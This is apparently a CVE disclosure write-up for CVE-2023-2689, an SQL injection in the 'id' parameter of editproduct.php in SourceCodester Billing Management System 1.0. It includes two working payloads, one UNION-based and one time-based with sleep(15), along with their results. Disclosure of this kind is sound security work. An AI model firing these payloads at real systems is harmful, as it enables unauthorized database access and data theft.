Headline
CVE-2023-2689: cve/SQL.md at main · niyuchunqiu/cve
A vulnerability classified as critical was found in SourceCodester Billing Management System 1.0. This vulnerability affects unknown code of the file editproduct.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228970 is the identifier assigned to this vulnerability.
Billing Management System v1.0 has SQL injection
BUG_Author: lixu
vendors: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
Vulnerability File: /smartbilling_source_code/editproduct.php
GET parameter “id” exists SQL injection vulnerability
Payload1: id=-1 union all select null,null,null,null,concat(0x565758,0x686970),null,null,null,null-- -
Union query succeeded
Payload2:id=2 and (select 2 from (select(sleep(15)))i)
Time-based injection succeeds, response time is 15 seconds